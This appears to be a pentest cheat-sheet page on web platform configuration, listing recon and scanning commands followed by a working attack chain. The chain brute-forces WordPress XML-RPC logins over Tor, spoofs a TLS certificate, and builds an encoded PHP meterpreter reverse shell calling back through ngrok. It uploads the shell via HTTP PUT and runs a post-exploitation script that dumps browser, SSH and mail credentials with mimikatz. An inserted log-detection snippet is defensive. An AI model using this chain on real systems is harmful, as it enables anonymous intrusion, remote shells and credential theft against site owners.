App Platform Configuration

Last updated 2 months ago

Check List

Cheat Sheet

Sample and Known Files and Directories

Multitor

20 Tor Tunnels

multitor --init 20 \
         --user debian-tor \
         --socks-port 9000 \
         --control-port 9900 \
         --proxy privoxy

Nikto

Scan Web Server

nikto -h $WEBSITE

SubFinder

Subdomain Enumeration

subfinder -d $WEBSITE -o /tmp/subdomains.txt

ShuffleDNS

Resolve Subdomains

echo "1.1.1.1" > /tmp/resolvers.txt
shuffledns -d $WEBSITE \
           -l /tmp/subdomains.txt \
           -r /tmp/resolvers.txt \
           -mode resolve \
           -o /tmp/alive-subdomains.txt

Httpx

Check Live HTTP Hosts

cat /tmp/alive-subdomains.txt | \
httpx -silent -sc -probe -title -td -ip \
      -mc 200,301,302,303,304,305,306,307,403,404 \
      -o /tmp/sub-domains.txt

Httpx-Toolkit

Find Alive Ports

httpx-toolkit -l /tmp/alive-subdomains.txt \
              -ports 80,443,8080,8000,8888,8082,8083 \
              -o /tmp/alive-sub-and-ports.txt

Katana

Find Source URLs

katana -u /tmp/alive-subdomains.txt \
       -d 5 -ps \
       -pss waybackarchive,commoncrawl,alienvault \
       -kf -jc -fx \
       -ef woff,css,png,svg,jpg,woff2,jpeg,gif \
       -o /tmp/all-urls.txt

Grep

Find Sensitive Files

cat /tmp/all-urls.txt | \
grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5'

Dirsearch

Directory Fuzzing

dirsearch -l /tmp/sub-domains.txt \
          -t 150 -x 403,404,500,429 -i 200,301,302 \
          --random-agent

Nuclei

List all Tags

nuclei -tgl

Scan OSINT & Recon

nuclei -u $WEBSITE -tags osint,enum,recon

Scan CVEs & Vulnerabilities

nuclei -u $WEBSITE -tags cves,detect,vulnerabilities

Scan CVEs with Multitor

nuclei -u $WEBSITE -tags cves,detect,vulnerabilities -proxy socks4://127.0.0.1:16379

Scan Misconfigurations & Panels

nuclei -u $WEBSITE -tags exposure,misconfig,disclosure,tech,panel

XSS & SQLi & LFI & RCE & SSRF

nuclei -u $WEBSITE -tags xss,lfi,sqli,ssrf,traversal,fileupload,rce,unauth,deserialization

WPScan

Scan General

wpscan --url $WEBSITE --rua --api-token $TOKEN

Scan with Multitor

wpscan --url $WEBSITE --rua --api-token $TOKEN --proxy socks4://127.0.0.1:16379

Enum Users

wpscan --url $WEBSITE --rua --api-token $TOKEN -e u,m

Enum Plugins

wpscan --url $WEBSITE --rua --api-token $TOKEN -e ap,vp,p

Enum Themes

wpscan --url $WEBSITE --rua --api-token $TOKEN -e at,vt,t

Enum Config Backups

wpscan --url $WEBSITE --rua --api-token $TOKEN -e cb,dbe,tt

Joomscan

Scan General

joomscan -u $WEBSITE --random-agent

Scan with Multitor

joomscan -u $WEBSITE --random-agent --proxy socks4://127.0.0.1:16379

Enum Endpoints

joomscan -u $WEBSITE --random-agent -ec

Droopescan

Scan General

droopescan scan drupal -u $WEBSITE

Enum Endpoints

droopescan scan drupal -u $WEBSITE --enumerate a

Drupwn

Scan General

drupwn --mode exploit --target $WEBSITE

Enum Endpoints

drupwn --mode enum --modules --target $WEBSITE

Enum Users

drupwn --mode enum --users --target $WEBSITE

SPartan

Scan SharePoint

spartan -u $WEBSITE --sps --users -s

IIS-ShortName-Scanner

Scan & Enum IIS

iis_shortname_scanner 2 20 $WEBSITE

Comment Review

Katana

HTML Sources

katana -u $WEBSITE

JS Sources

katana -u $WEBSITE | grep "\.js$"

CSS Sources

katana -u $WEBSITE | grep -E '\.css(\?|$)'

System Configuration

Lynis (Linux)

lynis audit system

Hardentools (Windows)

hardentools-cli.exe

Configuration Review

Nmap

HTTP Methods

nmap -sS -sV --mtu 5000 --script http-methods $WEBSITE

Metasploit

PingBack XMLRPC

msfconsole -qx "
    use auxiliary/scanner/http/wordpress_pingback_access;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    run;
    exit"

Brute force XMLRPC with Multitor

msfconsole -qx "
    use scanner/http/wordpress_xmlrpc_login;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set USERNAME admin;
    set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top10000.txt;
    set THREADS 10;
    set STOP_ON_SUCCESS true;
    set Proxies socks4:127.0.0.1:16379;
    run;
    exit"

Scan PUT Methods

msfconsole -qx "
    use auxiliary/scanner/http/http_put;
    set RHOSTS $WEBSITE;
    set RPORT 443;
    set SSL true;
    set PATH /wp-content/uploads;
    run -j"

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-Exploitation Script

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

Generate Webshell

msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=$NGHOST \
         LPORT=$NGPORT \
         HandlerSSLCert=$CERT \
         StagerVerifySSLCert=true \
         PayloadUUIDTracking=true \
         PayloadUUIDName=StagedPHP \
         EnableStageEncoding=true \
         -f raw \
         -e php/base64 \
         -i 3 \
         -o /tmp/unk9vvn.php; \
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php; \
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Metasploit Listener

msfconsole -qx "
    use multi/handler;
    set PAYLOAD php/meterpreter/reverse_tcp;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set EnableStageEncoding true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Upload Shell PUT Method

curl -v $WEBSITE/wp-content/uploads/ --upload-file /tmp/unk9vvn.php
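Both the XML-RPC login module and the PUT upload above leave a distinctive trace in the web server's access log. The following check is an added example, not from the original page or from any tool listed here: it parses Combined Log Format lines, flags a PUT that stores a server-side script under an upload directory, and counts bursts of POSTs to xmlrpc.php from one client. The upload-directory list, the burst threshold and the log lines are constructed assumptions.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Combined Log Format, the default access-log layout of Apache and nginx.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Server-side script extensions that must never land in a writable upload directory.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar)(\?|$)', re.IGNORECASE)
UPLOAD_DIRS = ('/wp-content/uploads/', '/uploads/')  # assumption: typical writable paths

@dataclass
class Finding:
    ip: str
    reason: str
    path: str

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None  # None for lines that are not Combined Log Format

def find_suspicious(lines, xmlrpc_threshold=20):
    """Flag PUT uploads of scripts into upload dirs and bursts of POSTs to xmlrpc.php."""
    findings, xmlrpc_posts = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # skip unparseable lines rather than crash on a hostile log
        path = rec['path'].split('?', 1)[0]
        # 1. A PUT that stores a server-side script where the web server will execute it.
        if rec['method'] == 'PUT' and path.startswith(UPLOAD_DIRS) and SCRIPT_EXT.search(rec['path']):
            findings.append(Finding(rec['ip'], f"PUT of script into upload dir (HTTP {rec['status']})", path))
        # 2. Many POSTs to xmlrpc.php from one client: credential guessing through XML-RPC.
        if rec['method'] == 'POST' and path.endswith('/xmlrpc.php'):
            xmlrpc_posts[rec['ip']] += 1
    for ip, n in xmlrpc_posts.items():
        if n >= xmlrpc_threshold:
            findings.append(Finding(ip, f'{n} POSTs to xmlrpc.php', '/xmlrpc.php'))
    return findings

# Constructed sample log: one script upload, one benign image upload, one xmlrpc.php burst.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] "PUT /wp-content/uploads/unk9vvn.php HTTP/1.1" 201 0 "-" "curl/8.4.0"',
    '203.0.113.7 - - [10/Oct/2024:13:55:40 +0000] "GET /wp-content/uploads/unk9vvn.php HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '198.51.100.2 - - [10/Oct/2024:13:56:01 +0000] "PUT /wp-content/uploads/photo.jpg HTTP/1.1" 201 0 "-" "Mozilla/5.0"',
] + ['198.51.100.9 - - [10/Oct/2024:14:00:%02d +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "python-requests/2.31"' % i
     for i in range(25)]
```

Running find_suspicious(SAMPLE_LOG) reports the PHP upload by 203.0.113.7 and the 25-request xmlrpc.php burst from 198.51.100.9, while the image upload is ignored.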

Logging

Commix

Code Injection

commix -u $WEBSITE
